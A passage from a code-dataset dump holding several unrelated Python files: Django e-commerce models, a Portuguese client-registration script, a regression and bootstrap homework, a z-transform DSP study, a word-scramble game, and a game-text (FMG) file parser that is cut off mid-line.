=True,blank=False)\n description = models.TextField(max_length=500,null=False,blank=False)\n status = models.BooleanField(default=False, verbose_name=(\"0=default 1=Hidden\"))\n trending = models.BooleanField(default=False, verbose_name=(\"0=default 1=Trending\"))\n meta_title = models.CharField(max_length=150,blank=False)\n meta_keywords = models.CharField(max_length=150,blank=False)\n meta_description = models.TextField(max_length=150,null=False,blank=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \n def __str__(self):\n return self.name\n \n \nclass Product(models.Model):\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n name = models.CharField(max_length=150,null=False,blank=False)\n image = models.ImageField(upload_to=get_file_path,null =True,blank=False)\n image2 = models.ImageField(upload_to=get_file_path,null =False,blank=True)\n image3= models.ImageField(upload_to=get_file_path,null =False,blank=True)\n image4 = models.ImageField(upload_to=get_file_path,null =False,blank=True)\n image5 = models.ImageField(upload_to=get_file_path,null =False,blank=True)\n small_description = models.CharField(max_length=250,null=False,blank=False)\n SIZE_CHOICES = {\n (\"S\",'S'),\n (\"M\",'M'),\n (\"L\",'L'),\n (\"XL\",'XL'),\n (\"XLL\",'XLL'),\n (\"XLLL\",'XLLL'),\n \n }\n size = models.CharField(max_length=50,choices=SIZE_CHOICES,default='M')\n quantity = models.IntegerField(null=False,blank=False,default=25)\n description = models.TextField(max_length=500,null=False,blank=False)\n orginal_price = models.FloatField(null=False,blank=False)\n selling_price = models.FloatField(null=False,blank=False)\n status = models.BooleanField(default=False, verbose_name=(\"0=default 1=Hidden\"))\n trending = models.BooleanField(default=False, verbose_name=(\"0=default 1=Trending\"))\n tag = models.CharField(max_length=150,null=False,blank=False)\n meta_title = models.CharField(max_length=150,blank=False)\n meta_keywords = models.CharField(max_length=150,blank=False)\n meta_description = models.TextField(max_length=150,null=False,blank=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \n \n def save(self, *args, **kwargs):\n super().save(*args, **kwargs)\n\n img1 = Image.open(self.image.path)\n if img1.height > 1500 or img1.width > 1500:\n output_size = (1500, 1500)\n img1.thumbnail(output_size)\n img1.save(self.image.path)\n\n if self.image2:\n img2 = Image.open(self.image2.path)\n if img2.height > 1500 or img2.width > 1500:\n output_size = (1500, 1500)\n img2.thumbnail(output_size)\n img2.save(self.image2.path)\n\n if self.image3:\n img3 = Image.open(self.image3.path)\n if img3.height > 1500 or img3.width > 1500:\n output_size = (1500, 1500)\n img3.thumbnail(output_size)\n img3.save(self.image3.path)\n\n if self.image4:\n img4 = Image.open(self.image4.path)\n if img4.height > 1500 or img4.width > 1500:\n output_size = (1500, 1500)\n img4.thumbnail(output_size)\n img4.save(self.image4.path)\n\n if self.image5:\n img5 = Image.open(self.image5.path)\n if img5.height > 1500 or img5.width > 1500:\n output_size = (1500, 1500)\n img5.thumbnail(output_size)\n img5.save(self.image5.path)\n\n \n def __str__(self):\n return self.name\n\n\n\nclass ProductReview(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n review = models.TextField()\n time = models.DateTimeField(auto_now=True)\n \nclass Cart(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n SIZE_CHOICES = {\n (\"S\",'S'),\n (\"M\",'M'),\n (\"L\",'L'),\n (\"XL\",'XL'),\n (\"XLL\",'XLL'),\n (\"XLLL\",'XLLL'),\n \n }\n size = models.CharField(max_length=50,choices=SIZE_CHOICES,default='M')\n product_qty = models.IntegerField(null=False, blank=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \nclass Wishlist(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now_add=True)\n \nclass Order(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n fname = models.CharField(max_length=150, null=False)\n lname = models.CharField(max_length=150, null=False)\n email = models.EmailField(max_length=150, null=False)\n phone = models.CharField(max_length=150, null=False)\n address = models.TextField( null=False)\n district = models.CharField(max_length=150,null=False)\n STATE_CHOICES = (\n\t\t(\"Andaman & Nicobar Islands\",'Andaman & Nicobar Islands'),\n\t\t(\"Andhra Pradesh\",'Andhra Pradesh'),\n\t\t(\"Arunachal Pradesh\",'Arunachal Pradesh'),\n\t\t(\"Assam\",'Assam'),\n\t\t(\"Bihar\",'Bihar'),\n\t\t(\"Chandigarh\",'Chandigarh'),\n\t\t(\"Chhattisgarh\",'Chhattisgarh'),\n\t\t(\"Dadra & Nagar Haveli\",'Dadra & Nagar Haveli'),\n\t\t(\"Daman and Diu\",'Daman and Diu'),\n\t\t(\"Delhi\",'Delhi'),\n\t\t(\"Goa\",'Goa'),\n\t\t(\"Gujarat\",'Gujarat'),\n\t\t(\"Haryana\",'Haryana'),\n\t\t(\"Himachal Pradesh\",'Himachal Pradesh'),\n\t\t(\"Jammu & Kashmir\",'Jammu & Kashmir'),\n\t\t(\"Jharkhand\",'Jharkhand'),\n\t\t(\"Karnataka\",'Karnataka'),\n\t\t(\"Kerala\",'Kerala'),\n\t\t(\"Lakshadweep\",'Lakshadweep'),\n\t\t(\"Madhya Pradesh\",'Madhya Pradesh'),\n\t\t(\"Maharashtra\",'Maharashtra'),\n\t\t(\"Manipur\",'Manipur'),\n\t\t(\"Meghalaya\",'Meghalaya'),\n\t\t(\"Mizoram\",'Mizoram'),\n\t\t(\"Nagaland\",'Nagaland'),\n\t\t(\"Odisha\",'Odisha'),\n\t\t(\"Puducherry\",'Puducherry'),\n\t\t(\"Punjab\",'Punjab'),\n\t\t(\"Rajasthan\",'Rajasthan'),\n\t\t(\"Sikkim\",'Sikkim'),\n\t\t(\"Tamil Nadu\",'Tamil Nadu'),\n\t\t(\"Telangana\",'Telangana'),\n\t\t(\"Tripura\",'Tripura'),\n\t\t(\"Uttarakhand\",'Uttarakhand'),\n\t\t(\"Uttar Pradesh\",'Uttar Pradesh'),\n\t\t(\"West Bengal\",'West Bengal'),\n\t\t)\n\t\n state = models.CharField(max_length=50,choices=STATE_CHOICES, null=True)\n country = models.CharField(max_length=150, null=False)\n pincode = models.CharField(max_length=150, null=False)\n total_price = models.FloatField(null=False)\n payment_mode = models.CharField(max_length=150, null=False)\n payment_id = models.CharField(max_length=250, null=True)\n orderstatuses = {\n ('Pending','Pending'),\n ('Out for Shipping','Out for Shipping'),\n ('Completed','Completed'),\n }\n status = models.CharField(max_length=150, choices=orderstatuses, default='Pending')\n message = models.TextField(null=True)\n tracking_id = models.CharField(max_length=150, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n \n def __str__(self):\n return ' {} - {}'.format(self.id,self.tracking_id)\n \nclass OrderItem(models.Model):\n order = models.ForeignKey(Order, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n SIZE_CHOICES = {\n (\"S\",'S'),\n (\"M\",'M'),\n (\"L\",'L'),\n (\"XL\",'XL'),\n (\"XLL\",'XLL'),\n (\"XLLL\",'XLLL'),\n \n }\n size = models.CharField(max_length=50,choices=SIZE_CHOICES,default='M')\n price = models.FloatField(null=False)\n quantity = models.IntegerField(null=False)\n \n def __str__(self):\n return ' {} - {}'.format(self.order.id,self.order.tracking_id)\n \n \nclass Profile(models.Model):\n def image_upload_to(self, instance=None):\n if instance:\n return os.path.join(\"store\", self.user, instance)\n return None\n\n\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n #image = models.ImageField(default='images/users.png', upload_to=image_upload_to)\n image = models.ImageField(default='static/images/users.png', upload_to='static/users',blank=True,null=True)\n\n phone = models.CharField(max_length=150, null=False)\n address = models.TextField( null=False)\n district = models.CharField(max_length=150,null=False)\n STATE_CHOICES = (\n\t\t(\"Andaman & Nicobar Islands\",'Andaman & Nicobar Islands'),\n\t\t(\"Andhra Pradesh\",'Andhra Pradesh'),\n\t\t(\"Arunachal Pradesh\",'Arunachal Pradesh'),\n\t\t(\"Assam\",'Assam'),\n\t\t(\"Bihar\",'Bihar'),\n\t\t(\"Chandigarh\",'Chandigarh'),\n\t\t(\"Chhattisgarh\",'Chhattisgarh'),\n\t\t(\"Dadra & Nagar Haveli\",'Dadra & Nagar Haveli'),\n\t\t(\"Daman and Diu\",'Daman and Diu'),\n\t\t(\"Delhi\",'Delhi'),\n\t\t(\"Goa\",'Goa'),\n\t\t(\"Gujarat\",'Gujarat'),\n\t\t(\"Haryana\",'Haryana'),\n\t\t(\"Himachal Pradesh\",'Himachal Pradesh'),\n\t\t(\"Jammu & Kashmir\",'Jammu & Kashmir'),\n\t\t(\"Jharkhand\",'Jharkhand'),\n\t\t(\"Karnataka\",'Karnataka'),\n\t\t(\"Kerala\",'Kerala'),\n\t\t(\"Lakshadweep\",'Lakshadweep'),\n\t\t(\"Madhya Pradesh\",'Madhya Pradesh'),\n\t\t(\"Maharashtra\",'Maharashtra'),\n\t\t(\"Manipur\",'Manipur'),\n\t\t(\"Meghalaya\",'Meghalaya'),\n\t\t(\"Mizoram\",'Mizoram'),\n\t\t(\"Nagaland\",'Nagaland'),\n\t\t(\"Odisha\",'Odisha'),\n\t\t(\"Puducherry\",'Puducherry'),\n\t\t(\"Punjab\",'Punjab'),\n\t\t(\"Rajasthan\",'Rajasthan'),\n\t\t(\"Sikkim\",'Sikkim'),\n\t\t(\"Tamil Nadu\",'Tamil Nadu'),\n\t\t(\"Telangana\",'Telangana'),\n\t\t(\"Tripura\",'Tripura'),\n\t\t(\"Uttarakhand\",'Uttarakhand'),\n\t\t(\"Uttar Pradesh\",'Uttar Pradesh'),\n\t\t(\"West Bengal\",'West Bengal'),\n\t\t)\n\t\n state = models.CharField(max_length=50,choices=STATE_CHOICES, null=True)\n country = models.CharField(max_length=150, null=False)\n pincode = models.CharField(max_length=150, null=False)\n created_at = models.DateTimeField(auto_now_add=True)\n \n def __str__(self):\n return self.user.username\n \n \n","repo_name":"amalmathew21/Adam","sub_path":"Adam/store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23762180443","text":"\"\"\"\nEntra21 Blusoft 2020 - Formação em Python\n\nAutores: Marcus Moresco Boeno e Maria Vitória Machado\nData: 2020-10-09\n\nCadastro básico de clientes e endereços utilizando:\n - Listas\n - Dicionários\n - Funções\n\"\"\"\n\n# Importando funcoes\nfrom funcoes_pessoa import cadastrar_pessoa, pessoas_cadastradas, cadastro_cliente \nfrom funcoes_endereco import cadastrar_endereco, enderecos_cadastrados, endereco_cliente\n\n# Apresenta cabecalho do sistema\nprint(\"\\n\" + \"*\"*90)\nprint(f\"{'Bem Vindo ao Cadastro de Clientes 1.0!':^90}\")\nprint(\"*\"*90)\n\nwhile True:\n\n # Apresenta quantidade de clientes cadastrados\n print(f\"\\n> {len(pessoas_cadastradas())} clientes cadastrados\")\n \n # Capta input do usuario quanto a terminar a execucao ou continuar\n while True:\n res = input(\"Deseja cadastrar novo cliente?! ([s]/n) \").strip().lower()\n if res in \"sn\":\n break\n \n # Cadastro de novo cliente\n if res in \"s\":\n print(\"\\n>>> Cadastrando novo cliente:\\n\")\n\n # Coletando dados pessoas\n print(\"--- Dados pessoais:\")\n nome = input(\"Nome: \").strip()\n sobrenome = input(\"Sobrenome: \").strip()\n idade = int(input(\"Idade: \").strip())\n\n # Realizando cadastro\n res_cad = cadastrar_pessoa(nome, sobrenome, idade)\n\n # Checa se cadastro foi realizado com sucesso\n if type(res_cad) is str:\n print(\"\\n\" + res_cad + \"\\n\")\n print(\"-\"*90 + \"\\n\")\n else:\n while True:\n # Se cadastro realizado com sucesso, registrar endereco\n print(\"\\n--- Endereço:\")\n rua = input(\"Rua: \").strip()\n numero = input(\"Número: \").strip()\n complemento = input(\"Complemento: \").strip()\n bairro = input(\"Bairro: \").strip()\n cidade = input(\"Cidade: \").strip()\n estado = input(\"Estado: \").strip()\n\n # Realizando cadastro de endereco\n res_endereco = cadastrar_endereco(\n res_cad, rua, numero, complemento, bairro, cidade, estado\n )\n \n # Apresenta mensagem se cadastro foi concluído ou não\n if res_endereco[0] == 0:\n print(\"\\n\" + res_endereco[1] + \"\\n\")\n print(\"Refazendo cadastro de endereço ...\")\n else:\n print(\"\\n\" + res_endereco[1] + \"\\n\")\n print(\"-\"*90 + \"\\n\")\n break\n \n # Apresentacao dos clientes em tela e termino da execucao\n else:\n print(\"\\n>>> Apresentando Cadastros:\")\n\n # Apresenta cabecalho\n print(\"\\n\" + \"*\"*90)\n print(f\"{'CLIENTES CADASTRADOS':^90}\")\n print(\"*\"*90 + \"\\n\")\n \n # Recupera lista de clientes\n clientes = pessoas_cadastradas()\n\n # Itera sobre clientes\n for cliente in clientes:\n id_cliente = cliente['id']\n endereco = endereco_cliente(id_cliente)\n print(f\"> Cliente #{id_cliente}\")\n print(f\" Nome: {cliente['nome']} {cliente['sobrenome']}\")\n print(f\" Idade: {cliente['idade']} anos\")\n print(\n \" Endereço: {}, {}, {}, {}, {}-{}\\n\".format(\n endereco['rua'],\n endereco['numero'],\n endereco['complemento'],\n endereco['bairro'],\n endereco['cidade'],\n endereco['estado'],\n )\n )\n \n # Apresenta rodape\n print(\"*\"*90 + \"\\n\")\n\n # Apresenta mensagem de fim de execução\n print(\"Saindo do sistema, até logo...\\n\")\n break\n","repo_name":"boenomarcus/entra21_py","sub_path":"aulas_maykon/aula_008_def_dict/main_cadastro.py","file_name":"main_cadastro.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35947718983","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nimport sklearn.linear_model as skl_lm\r\n\r\nbd = datasets.load_boston()\r\nnames = bd['feature_names']\r\nbd.columns = names\r\nX = pd.DataFrame(bd.data)\r\nX.columns = names\r\ny = pd.DataFrame(bd.target)\r\ny.columns = np.array([\"MEDV\"])\r\nX.head()\r\ny.head()\r\nRM = X['RM']\r\n\r\n#Prudcuce plot of 'MEDV' vs 'RM'\r\nax = plt.gca()\r\nax.scatter(RM, y)\r\nplt.xlabel('RM')\r\nplt.ylabel('MDEV')\r\n\r\ndf = pd.DataFrame(RM)\r\ndf['MDEV'] = y\r\n0.8 * len(df)\r\ntrain_df = df.sample(405, random_state=1)\r\ntest_df = df[~df.isin(train_df)].dropna(how = 'all')\r\n\r\nX_train = train_df['RM'].values.reshape(-1,1)\r\ny_train = train_df['MDEV']\r\nX_test = test_df['RM'].values.reshape(-1,1)\r\ny_test = test_df['MDEV']\r\n\r\nlm = skl_lm.LinearRegression()\r\nmodel = lm.fit(X_train, y_train)\r\npred = model.predict(X_test)\r\n\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\nMSE = mean_squared_error(y_test, pred)\r\n\r\nprint(\"Linear Regression MSE: \", MSE)\r\n\r\n#Kfold cv\r\n\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\n\r\ncv_k = KFold(n_splits = 10, random_state = 1, shuffle=True)\r\n\r\nscores_k = cross_val_score(model, X, y, scoring=\"neg_mean_squared_error\", cv = cv_k, n_jobs=1)\r\n\r\nprint(\"Using KFold: Folds: \" + str(len(scores_k)) +\", MSE: \" + str(np.mean(np.abs(scores_k))) + \", STD: \" + str(np.std(scores_k)))\r\n\r\nprint(\"Cross-validated scores:\", np.abs(scores_k))\r\n\r\nfrom sklearn.model_selection import cross_val_predict\r\npredictions = cross_val_predict(model, X, y, cv=cv_k, n_jobs=1)\r\n#plt.scatter(y,predictions)\r\n\r\n#LOOCV\r\n\r\nmodel = lm.fit(X_train, y_train)\r\nfrom sklearn.model_selection import LeaveOneOut\r\nloo = LeaveOneOut()\r\nX = df['RM'].values.reshape(-1,1)\r\ny = df['MDEV'].values.reshape(-1,1)\r\nloo.get_n_splits(X)\r\n\r\ncv_loo = KFold(n_splits = len(X), random_state=None, shuffle=True)\r\n\r\nscores_loo = cross_val_score(model, X, y, scoring=\"neg_mean_squared_error\", cv=cv_loo, n_jobs=1)\r\n\r\nprint(\"Using LOOCV Folds: \" + str(len(scores_loo)), \", MSE: \" + str(np.mean(np.abs(scores_loo))) + \", STD: \" +str(np.std(scores_loo)))\r\n\r\n\r\ndef bt(df, B):\r\n sample_R=[]\r\n data = []\r\n for i in range(B):\r\n for j in range(10):\r\n x = np.random.choice(503, 1)\r\n n = df.iloc[x,:]\r\n data.append(dict(n))\r\n y = pd.DataFrame(data)\r\n z = y.astype(float)\r\n corr = z.corr(method='pearson')\r\n corr1 = corr.iloc[0,1]\r\n sample_R.append(corr1)\r\n data=[]\r\n return(sample_R)\r\n \r\n\r\n\r\ntest = bt(df,50)\r\ngraph = pd.DataFrame(test)\r\ngraph.plot.hist(grid = True,bins = 10, rwidth=1)\r\nplt.title('Distrubution of R')\r\nplt.xlabel('Sample')\r\nplt.ylabel('R')\r\nplt.grid(axis='y', alpha=0.75)\r\n\r\nprint(\"Median estimate: \", np.median(test))\r\nprint(\"Average estimate: \", np.mean(test))\r\nprint(\"Standard Error estimate: \", np.std(test))\r\n\r\nbasic = np.quantile(test,(0.025,0.975))\r\nprint(\"95% confidence interval: \", basic)\r\n\r\ndef bt_beta(df,B):\r\n data = []\r\n sample_beta = []\r\n sample_intercept = []\r\n lm = skl_lm.LinearRegression()\r\n for i in range(B):\r\n for j in range(10):\r\n x = np.random.choice(503, 1)\r\n n = df.iloc[x,:]\r\n data.append(dict(n))\r\n names = ['RM', 'MDEV']\r\n frame = pd.DataFrame(data = data, columns = names)\r\n flo = frame.astype(float)\r\n X = np.array(flo['RM']).reshape(-1,1)\r\n y = np.array(flo['MDEV']).reshape(-1,1)\r\n n = lm.fit(X,y)\r\n c = n.coef_\r\n inter = n.intercept_\r\n sample_intercept.append(inter)\r\n sample_beta.append(c)\r\n data = []\r\n #result = {'Intercept': [sample_intercept], 'Beta': [sample_beta]}\r\n int_result = pd.DataFrame(sample_intercept)\r\n results= pd.DataFrame(int_result)\r\n beta_result = np.array(sample_beta).reshape(-1,1)\r\n beta_formatted = pd.DataFrame(beta_result)\r\n results['Beta'] = pd.DataFrame(beta_formatted)\r\n return(results)\r\n \r\n\r\n\r\nX = pd.DataFrame(df['RM'])\r\ny = pd.DataFrame(df['MDEV'])\r\ntest2 = bt_beta(df, 50)\r\nintercepts = test2.iloc[:,0]\r\nbetas = test2['Beta']\r\nintercept_result = np.mean(intercepts)\r\nbeta_result = np.mean(betas)\r\nprint(\"Intercept Estimate: \", intercept_result )\r\nprint(\"Beta Estimate\", beta_result)\r\n\r\ndef bt_beta_SE(df, B):\r\n data = np.zeros((B,2))\r\n sample_betaSE = []\r\n sample_intSE = []\r\n for i in range(B):\r\n for j in range(10):\r\n x = np.random.choice(50, 1)\r\n n = df.iloc[x,:]\r\n data[i] = n\r\n names = ['Intercept', 'Beta']\r\n frame = pd.DataFrame(data = data, columns = names)\r\n flo = frame.astype(float)\r\n X = np.array(flo['Intercept']).reshape(-1,1)\r\n y = np.array(flo['Beta']).reshape(-1,1)\r\n int_se = np.std(X)\r\n beta_se = np.std(y)\r\n sample_betaSE.append(beta_se)\r\n sample_intSE.append(int_se)\r\n int_result = np.array(sample_intSE)\r\n int_formatted = pd.DataFrame(int_result)\r\n results= pd.DataFrame(int_formatted)\r\n beta_result = np.array(sample_betaSE)\r\n beta_formatted = pd.DataFrame(beta_result)\r\n results['Beta'] = pd.DataFrame(beta_formatted)\r\n return(results)\r\n\r\n#k = test2.iloc[2, :]\r\n#k_std = np.std(k)\r\n\r\ntest3 = bt_beta_SE(test2, 50)\r\nintercept_se = test3.iloc[:,0]\r\nbeta_se = test3['Beta']\r\nintercept_se_avg = np.mean(intercept_se)\r\nbeta_se_avg = np.mean(beta_se)\r\nprint(\"Intercept SE Estimate: \", intercept_se_avg)\r\nprint(\"Beta SE Estimate\", beta_se_avg)\r\n\r\nimport statsmodels.api as sm\r\nlr = pd.DataFrame()\r\nlr['x'] = df['RM']\r\nlr['y'] = df['MDEV']\r\n\r\nlm = sm.OLS.from_formula('y~x', lr)\r\nresult = lm.fit()\r\nprint(result.summary())\r\n\r\n#confidence interval\r\n\r\nlower_bound = beta_result - 2*beta_se_avg\r\nupper_bound = beta_result + 2*beta_se_avg\r\n\r\n\r\nCI = np.array([lower_bound,upper_bound])\r\nprint(\"Confidence Interval:\", CI)","repo_name":"julesguasp/Python_Portfolio","sub_path":"Python_Assignments/Assignment2/hw2_1.py","file_name":"hw2_1.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70851931629","text":"'''\r\nDate: 2021.12.07\r\nTitle: z- transform study\r\nBy: Kang Jin Seong\r\n'''\r\n\r\nimport numpy as np\r\nfrom scipy import signal\r\n\r\ndef convole_m(x,nx,h,nh):\r\n nyb = min(nx) + min(nh)\r\n nye = max(nx) + max(nh)\r\n ny = np.arange(nyb,nye+1)\r\n y = np.convolve(x,h)\r\n return y, ny\r\n\r\ndef impseq(n0,n1,n2):\r\n N = n2-n1+1\r\n x = np.zeros(N)\r\n n = np.arange(N)\r\n for i in range(N):\r\n if i==n0: x[i] = 1\r\n return x,n\r\n\r\ndef stepseq(n0,n1,n2):\r\n N = n2-n1+1\r\n x = np.zeros(N)\r\n n = np.arange(N)\r\n for i in range(N):\r\n if i-n0>=0: x[i] = 1\r\n return x,n\r\n\r\n \r\n\r\n\r\ndef main():\r\n # x1 = [1,2,3]; n1 = np.arange(-1,2)\r\n # print('x1(n) = ',x1,'n1 = ',n1)\r\n # x2 = [2,4,3,5]; n2 = np.arange(-2,2)\r\n # print('x2(n) = ',x2,'n2 = ',n2)\r\n # x3,n3 = convole_m(x1,n1,x2,n2)\r\n # print('x3(n) = ',x3,'n3 = ',n3)\r\n\r\n b = [0,0,0,0.25,-0.5,0.0625]\r\n a = [1,-1,0.75,-0.25,0.0625]\r\n\r\n N = 8\r\n\r\n delta,n = impseq(0,0,7); print('impulse=',delta)\r\n x = signal.lfilter(b,a,delta); print('x(n) = ', x)\r\n n = np.arange(N)\r\n\r\n s,n1 = stepseq(2,0,7); print('step u(n-2) =', s);\r\n x = (n1-2)*np.power(0.5,n1-2)*np.cos(np.pi/3*(n1-2))*s\r\n print('x(n) =',x)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"KangJinSeong/DSP-STUDY","sub_path":"chap05_ex05.py","file_name":"chap05_ex05.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22302427665","text":"import random\nwords = ['rainbow', 'computer', 'science', 'programming', 'mathematics', 'player', 'condition', 'reverse', \n 'water', 'board', 'geeks'] \nword = random.choice(words)\nshuffled = list(word)\nrandom.shuffle(shuffled)\nshuffled = ' '.join(shuffled)\nprint(shuffled) \nanswer = input('Your answer: ')\nif answer == word:\n print('hurray')\nelse:\n print('oops')\n\n\n\n","repo_name":"nerissavu/D4E-TC-NGA","sub_path":"Session3/homework/serious_exercises_3.2.py","file_name":"serious_exercises_3.2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120935400","text":"from __future__ import annotations\n\n__all__ = [\"FMG\", \"BaseFMG\", \"FMG0\", \"FMG1\", \"FMG2\"]\n\nimport abc\nimport logging\nfrom textwrap import wrap\n\nfrom soulstruct.base.game_file import GameFile\nfrom soulstruct.utilities.binary import BinaryStruct, BinaryReader\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef FMG(fmg_source, dcx_type=None, remove_empty_entries=True) -> BaseFMG:\n if fmg_source is None:\n raise ValueError(f\"Cannot auto-detect FMG class from source `None`.\")\n if isinstance(fmg_source, dict):\n try:\n version = fmg_source[\"version\"]\n except KeyError:\n raise ValueError(f\"No `version` key in FMG dictionary to read.\")\n elif isinstance(fmg_source, GameFile.Types):\n version = BinaryReader(fmg_source).unpack_value(\"b\", offset=6, relative_offset=True)\n else:\n raise ValueError(f\"Cannot auto-detect FMG class from source type {type(fmg_source)}.\")\n\n if version == 0:\n return FMG0(fmg_source, dcx_type=dcx_type, remove_empty_entries=remove_empty_entries)\n elif version == 1:\n return FMG1(fmg_source, dcx_type=dcx_type, remove_empty_entries=remove_empty_entries)\n elif version == 2:\n return FMG2(fmg_source, dcx_type=dcx_type, remove_empty_entries=remove_empty_entries)\n else:\n raise ValueError(f\"Unrecognized FMG version: {version}\")\n\n\nclass BaseFMG(GameFile, abc.ABC):\n \"\"\"Simple text dictionary.\n\n Since Demon's Souls, only the `version` field differs between games, with slight header structure changes.\n \"\"\"\n\n EXT = \".fmg\"\n HEADER_STRUCT: BinaryStruct = None\n RANGE_STRUCT: BinaryStruct = None\n STRING_OFFSET_STRUCT: BinaryStruct = None\n BIG_ENDIAN = False\n VERSION = None # type: int\n\n MAX_LINES = None # type: int\n\n entries: dict[int, str]\n\n def __init__(self, fmg_source, dcx_type=None, remove_empty_entries=True):\n self.entries = {}\n if isinstance(fmg_source, dict) and \"version\" not in fmg_source:\n fmg_source[\"version\"] = self.VERSION\n super().__init__(fmg_source, dcx_type)\n if remove_empty_entries:\n self.entries = {i: entry for i, entry in self.entries.items() if entry}\n\n def load_dict(self, data: dict, clear_old_data=True):\n if data[\"version\"] != self.VERSION:\n raise ValueError(f\"FMG dictionary has version {data['version']}, but requires version {self.VERSION}.\")\n if clear_old_data:\n self.entries = data[\"entries\"]\n else:\n self.entries.update(data[\"entries\"])\n\n def unpack(self, reader: BinaryReader, remove_empty_entries=True):\n header = reader.unpack_struct(self.HEADER_STRUCT)\n\n # Groups of contiguous text string IDs are defined by ranges (first ID, last ID) to save space.\n ranges = reader.unpack_structs(self.RANGE_STRUCT, count=header[\"range_count\"])\n if reader.position != header[\"string_offsets_offset\"]:\n _LOGGER.warning(\"Range data did not end at string data offset given in FMG header.\")\n string_offsets = reader.unpack_structs(self.STRING_OFFSET_STRUCT, count=header[\"string_count\"])\n\n # Text pointer table corresponds to all the IDs (joined together) of the above ranges, in order.\n for string_range in ranges:\n i = string_range[\"first_index\"]\n for string_id in range(string_range[\"first_id\"], string_range[\"last_id\"] + 1):\n if string_id in self.entries:\n raise ValueError(f\"Malformed FMG: Entry index {string_id} appeared more than once.\")\n string_offset = string_offsets[i][\"offset\"]\n if string_offset == 0:\n if not remove_empty_entries:\n # Empty text string. These will trigger in-game error messages, like ?PlaceName?.\n # Distinct from ' ', which is intentionally blank text data (e.g. the unused area subtitles).\n self.entries[string_id] = \"\"\n else:\n string = reader.unpack_string(offset=string_offset, encoding=\"utf-16le\")\n if string or not remove_empty_entries:\n self.entries[string_id] = string\n i += 1\n\n def to_dict(self):\n return {\n \"dcx_type\": self.dcx_type.value,\n \"version\": self.VERSION,\n \"entries\": self.entries.copy(),\n }\n\n def pack(self, remove_empty_entries=True, pipe_to_newline=True, word_wrap_limit=None, max_lines=None):\n \"\"\"Pack text dictionary to binary FMG file.\n\n Args:\n remove_empty_entries: Ignore empty entries ('') when writing. This will remove many entries from the vanilla\n FMG files, and likely make some of them larger (as the ranges used to define them will be more broken\n up), but will make the dictionary much easier to read through. (Default: True)\n pipe_to_newline: Convert pipes ('|') to newlines ('\\n'), which allows for nicer strings. Newline characters\n will still be treated normally. (Default: True)\n word_wrap_limit: Specify a horizontal character limit for automatic word wrapping. If None, no wrapping will\n be applied. (Default: None)\n max_lines: Maximum number of lines that should appear in each text entry. An error will be raised if any\n text exceeds this (and no file will be written). This is most useful for item descriptions when auto\n wrapping is used. It defaults to a class value, `.MAX_LINES`.\n\n Note that none of these arguments will modify the entries in this FMG instance, only the packed output.\n \"\"\"\n if max_lines is None:\n max_lines = self.MAX_LINES\n\n # Convert to sorted list (sorted by ID).\n if remove_empty_entries:\n fmg_entries = sorted([(k, v) for k, v in self.entries.items() if v != \"\"], key=lambda x: x[0])\n else:\n fmg_entries = sorted([(k, v) for k, v in self.entries.items()], key=lambda x: x[0])\n\n for i in range(len(fmg_entries)):\n # Optional: convert double spaces to double new lines.\n index, string = fmg_entries[i]\n if pipe_to_newline:\n string = string.replace(\"|\", \"\\n\")\n fmg_entries[i] = (index, string)\n # Optional: insert new lines to wrap automatically.\n if word_wrap_limit is not None:\n lines = string.split(\"\\n\\n\")\n if lines != [\" \"]:\n # Wrap lines, and re-add manual newlines.\n wrapped_lines = []\n for line in lines:\n if \"\\n\" in line:\n # Don't touch lines with newlines already in them.\n wrapped_lines.append(line)\n else:\n wrapped_lines.append(\"\\n\".join(wrap(line, word_wrap_limit)))\n wrapped_string = \"\\n\\n\".join(wrapped_lines).rstrip(\"\\n\")\n line_count = wrapped_string.count(\"\\n\") + 1\n if max_lines is not None and line_count > max_lines - 1:\n _LOGGER.warning(\n f\"FMG index {index} has {line_count} lines (max is {max_lines}):\\n\" f\"{wrapped_string}\"\n )\n fmg_entries[i] = (index, wrapped_string)\n\n # Encode all text entries and pack them, and record the offsets (will be globally offset later).\n relative_string_offset = 0\n packed_strings = b\"\"\n string_offset_list = []\n\n for string_id, string in fmg_entries:\n if string == \"\":\n string_offset_list.append(-1) # changed to zero when offsets become absolute\n null_terminated_text = string.encode(\"utf-16le\") + b\"\\0\\0\"\n packed_strings += null_terminated_text\n string_offset_list.append(relative_string_offset)\n relative_string_offset += len(null_terminated_text)\n\n # Next, the ranges. We just make these as efficient as possible, but unlike FROM, we value the lack of clutter\n # from empty entries more highly than defining a handful less ranges.\n ranges = []\n range_start_index = None\n range_start = None\n range_stop = None\n for string_index, (string_id, _) in 